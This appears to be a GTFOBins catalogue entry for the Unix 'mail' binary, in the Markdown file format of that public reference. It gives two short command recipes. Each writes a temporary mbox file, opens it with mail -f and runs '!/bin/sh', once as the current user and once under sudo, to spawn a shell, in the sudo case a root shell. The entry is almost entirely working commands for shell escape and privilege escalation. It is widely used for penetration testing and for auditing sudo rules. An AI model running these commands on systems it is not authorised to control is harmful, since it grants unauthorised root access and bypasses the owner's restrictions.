GTFOBins.github.io/_gtfobins/mail.md

483 B

functions
execute-interactive sudo-enabled
description code
This creates a valid Mbox file which may be required by the binary. TF=$(mktemp) echo "From nobody@localhost $(date)" > $TF mail -f $TF !/bin/sh
description code
This creates a valid Mbox file which may be required by the binary. TF=$(mktemp) echo "From nobody@localhost $(date)" > $TF sudo mail -f $TF !/bin/sh